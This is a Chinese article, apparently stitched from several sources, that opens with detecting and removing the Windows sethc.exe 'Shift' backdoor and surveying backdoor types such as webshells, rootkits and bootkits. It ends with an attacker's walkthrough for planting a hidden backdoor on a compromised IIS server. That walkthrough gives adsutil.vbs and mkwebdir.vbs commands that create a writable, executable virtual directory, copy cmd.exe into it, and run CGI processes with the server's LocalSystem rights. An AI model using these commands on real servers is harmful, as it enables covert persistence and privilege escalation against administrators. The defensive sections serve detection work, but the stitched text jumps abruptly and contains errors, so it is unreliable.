Shift后门的检测与清除

body{

line-height:200%

}

Shift后门的检测与清除

通过远程桌面连接工具连接到Windows远程桌面，在没有输入用户名和密码前，连接按5次Shift键，可以运行“sethc.exe”，从而弹出“粘滞键”对话框，如图10-43所示。

这种不需要登录就能运行命令的做法也被黑客用来放置后门。通常黑客采用替换“sethc.exe”为别的文件的方法来可以实现运行任意程序的目的。例如把“sethc.exe”替换成“cmd.exe”，就可以打开命令提示符窗口了。

其实Shift后门的检测和清理方法也很简单。

1.拒绝使用sethc.exe

首先找到C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache下的seth.exe。

删除所有文件安全设置下的用户，将“Everyone的权限”列表框中的选项，全部勾选“拒绝”复选框，如图10-44所示。

2.禁用Shift键

登录服务器后，连续按5次Shift键，在弹出的对话框中单击“设置”按钮，然后会弹出“辅助选项设置”对话框，取消对所有复选框的勾选，如图10-45所示。

如果选择后面一种处理方法，可以先找到C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的magnify.exe。

首先我们要认识一下什么是后门程序? 在网络上常见的对“后门”的解释，其实我们可以用很简单的一句话来概括它：后门就是留在计算机系统中，供某位特殊使用都通过某种特殊方式控制计算机系统的途径!!——很显然，掌握好后门技术是每个网络安全爱好者不可或缺的一项基本技能!它能让你牢牢抓住肉鸡，让它永远飞不出你的五指山!正因如此所以后门技术与反后门的检测技术也成为了黑客功防战的焦点。正所谓知己知彼，百战不殆。要了解反后门技术那么我们就要更多的深入去学习与了解后门知识。后门的分类后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从技术方面来考虑后门程序的分类方法：前面讲了这么多理论知识是不是觉得有点头大了呢?下面我们来讲讲一些常见的后门工具吧1.网页后门此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式，比如ASP、PHP、cgi脚本后门等。典型后门程序：海洋顶端，红粉佳人个人版，后来衍生出来很多版本的这类网页后门，编写语言asp,aspx,jsp,php的都有种类比较繁多。2.线程插入后门利用系统自身的某个服务或者线程，将后门程序插入到其中，这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。典型后门程序：代表BITS，还有我在安全焦点上看到的xdoor(首款进程插入后门)也属于进程插入类后门。3.扩展后门所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。典型后门程序：Wineggdroup shell4.C/S后门这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光.典型后门程序：ICMP Door5.root kit好多人有一个误解，他们认为rootkit是用作获得系统root访问权限的工具。实际上，rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，或者首先密码猜测或者密码强制破译的方式获得系统的访问权限。进入系统后，如果他还没有获得root权限，再通过某些安全漏洞获得系统的root权限。接着，攻击者会在侵入的主机中安装rootkit，然后他将经常通过rootkit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其它系统的用户和密码之后，攻击者就会利用这些信息侵入其它的系统。典型后门程序：hacker defender以上是我在网上搜集的前人总结，值得指出的是这些分类还不够完善，还没有真正指出后门的强大。下面我继续补充点我更新黑基技术文章时看到的一些比较少见的后门技术。6 BootRoot通过在Windows内核启动过程中额外插入第三方代码的技术项目，即为“BootRoot”。国外组织eBye在通过这种新的Rootkit启动技术，并赋予这种无需依赖Windows内核启动过称去加载自身代码的技术及其衍生品——“BootKit”，即“Boot Rootkit”。Mebroot是如何实现MBR感染与运作的Mebroot比Windows还要早一步启动，然后将自身驱动代码插入内核执行，从而绕过了注册表HIVE检测的缺陷。同时采用的底层技术让大部分Anti-Rootkit工具失明——因为它根本没有在系统内留下任何启动项目。检测工具自然会检测失效。然后通过DLL远程注入用户进程，为系统打开后门并下载木马运行。在这非传统的渗透思路下，反Rootkit工具是无法根除它的。看到以上这么多可怕的后门知识是不是对这些有所了解了呢?下面我们来谈谈如何检测后门1.简单手工检测法凡是后门必然需要隐蔽的藏身之所，要找到这些程序那就需要仔细查找系统中每个可能存在的可疑之处，如自启动项，据不完全统计，自启动项目有近80多种。用AutoRuns检查系统启动项。观察可疑启动服务，可疑启动程序路径，如一些常见系统路径一般在system32下，如果执行路径种在非系统的system32目录下发现notepadSystemsmss.execsrss.exewinlogon.exeservices.exelsass.exespoolsv.exe这类进程出现2个那你的电脑很可能已经中毒了。如果是网页后门程序一般是检查最近被修改过的文件，当然目前一些高级webshell后门已经支持更改自身创建修改时间来迷惑管理员了。2.拥有反向连接的后门检测这类后门一般会监听某个指定断口，要检查这类后门需要用到dos命令在没有打开任何网络连接页面和防火墙的情况下输入netstat -an 监听本地开放端口，看是否有本地ip连接外网ip。3.无连接的系统后门如shift，放大镜，屏保后门，这类后门一般都是修改了系统文件，所以检测这类后门的方法就是对照他们的MD5值 如sethc.exe(shift后门)正常用加密工具检测的数值是MD5 : f09365c4d87098a209bd10d92e7a2bed如果数值不等于这个就说明被篡改过了。4.CA后门CA克隆帐号这样的后门建立以$为后缀的超级管理员在dos下无法查看该用户，用户组管理也不显示该用户，手工检查一般是在sam里删除该帐号键值。当然要小心，没有经验的建议还是用工具。当然CA有可能克隆的的是guest用户，所以建议服务器最好把guest设置一个复杂密码。5.对于ICMP这种后门这种后门比较罕见，如果真要预防只有在默认windows防火墙中设置只 允许ICMP传入的回显请求了。6.对于rootkit这类后门隐藏比较深，从一篇安全焦点的文献我们可以了解到他的历史也非常长，1989年发现首例在Unix上可以过滤自己进程被ps -aux 命令的查看的rootkit雏形。此后这类高级隐藏工具不断发展完整，并在94年成功运用到了高级后门上并开始流行，一直保持着后门的领先地位，包括最新出现的Boot Root也是该后门的一个高级变种。为了抵御这类高级后门国外也相续出现了这类查杀工具。例如：荷兰的反Root Kit的工具Gmer,Rootkit Unhooker和RKU都可以检测并清除这些包括变种的RootKit.

IIS是比较流行的www服务器，设置不当漏洞就很多。入侵iis服务器后留下后门，以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听，比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点（他们的管理员吃了苦头后）一般通过防火墙对端口进行限制，这样除了管理员开的端口外，其他端口就不能连接了。但是80端口是不可能关闭的（如果管理员没有吃错药）。那么我们可以通过在80端口留后门，来开启永远的后门。

当IIS启动CGI应用程序时，缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号，当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低，可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式，来提高权限。我们来看iis主进程本身是运行在localsystem账号下的，所以我们就可以得到最高localsystem的权限。

入侵web服务器后，一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制，比如3389，或者类telnet text方式的控制，比如rnc。nc肯定是可以用的,其实这也足够了。

1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root

KeyType : (STRING) "IIsWebVirtualDir"

AppRoot : (STRING) "/LM/W3SVC/1/ROOT"

AppFriendlyName : (STRING) "默认应用程序"

AppIsolated : (INTEGER) 2

AccessRead : (BOOLEAN) True

AccessWrite : (BOOLEAN) False

AccessExecute : (BOOLEAN) False

AccessScript : (BOOLEAN) True

AccessSource : (BOOLEAN) False

AccessNoRemoteRead : (BOOLEAN) False

AccessNoRemoteWrite : (BOOLEAN) False

AccessNoRemoteExecute : (BOOLEAN) False

AccessNoRemoteScript : (BOOLEAN) False

HttpErrors : (LIST) (32 Items)

"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"

"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"

"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"

"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"

"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"

"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"

"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"

"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"

"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"

"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"

"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"

"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"

"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"

"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"

"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"

"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"

"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"

"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"

"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"

"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"

"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"

"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"

"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"

"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"

"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"

"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"

"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"

"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"

"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"

"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"

"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"

"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True

Path : (STRING) "c:\inetpub\wwwroot"

AccessFlags : (INTEGER) 513

[/w3svc/1/root/localstart.asp]

[/w3svc/1/root/_vti_pvt]

[/w3svc/1/root/_vti_log]

[/w3svc/1/root/_private]

[/w3svc/1/root/_vti_txt]

[/w3svc/1/root/_vti_script]

[/w3svc/1/root/_vti_cnf]

[/w3svc/1/root/_vti_bin]

不要告诉我你不知道上面的输出是什么！！！！

现在我们心里已经有底了，是不是！呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1

4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"

这样就建好了一个虚目录：Virtual Dir1

你可以用 1 的命令看一下

5. 接下来要改变一下Virtual Dir1的属性为execute

cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:

cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:

现在你已经可以upload 内容到该目录，并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false

注释：cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path

这样的后门几乎是无法查出来的，除非把所有的虚目录察看一遍（如果管理员写好了遗书，那他就去查吧）

大家不可以用来做非法的攻击，一切后果自负

---